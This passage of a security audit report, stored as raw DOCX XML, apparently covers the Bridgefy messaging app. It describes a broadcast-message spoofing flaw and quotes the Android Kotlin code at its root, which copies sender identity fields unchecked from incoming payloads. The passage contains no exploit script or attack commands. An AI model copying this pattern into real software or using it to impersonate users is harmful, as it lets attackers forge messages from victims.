        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>even</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>spoof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>appear</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>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1"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="580" w:lineRule="atLeast" w:before="0"/>
        <w:ind w:left="720" w:right="2367" w:firstLine="2251"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15745024">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3079534</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-2265209</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2066925" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="52" name="Image 52"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="52" name="Image 52"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId102" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2066925" cy="2419350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spoofed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>broadcast</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>messages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>iOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The root cause of this issue can be found in the following files: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Affected File (Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="42"/>
        <w:ind w:left="720" w:right="369" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/Framework/MessageManager/src/main/java/me/bridgefy/framewor k/messagemanager/internal/MessageManagerImpl.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(Android):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="36"/>
        <w:ind w:left="1511" w:right="3596" w:hanging="792"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>suspend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>saveNewBroadcastMessageReceived( messageId: String,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>BroadcastPayload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="5012" w:hanging="396"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageRepository.addMessage( MessageEntity(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>chatRoomId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"broadcast"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2303" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageStatus.STATUS_SENT.ordinal, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>receiverId </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="4802" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>receiverNickName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>receiverName </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>receiverAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="2303" w:right="3392" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderNickName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-18"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderNickname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderName </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>= payload.senderName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload.senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= payload.message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="2862" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>OtherTextWithAvatarViewType, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>createdOn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= payload.createdOn,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="2303" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dateSent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System.currentTimeMillis(), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>messageEncrypt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
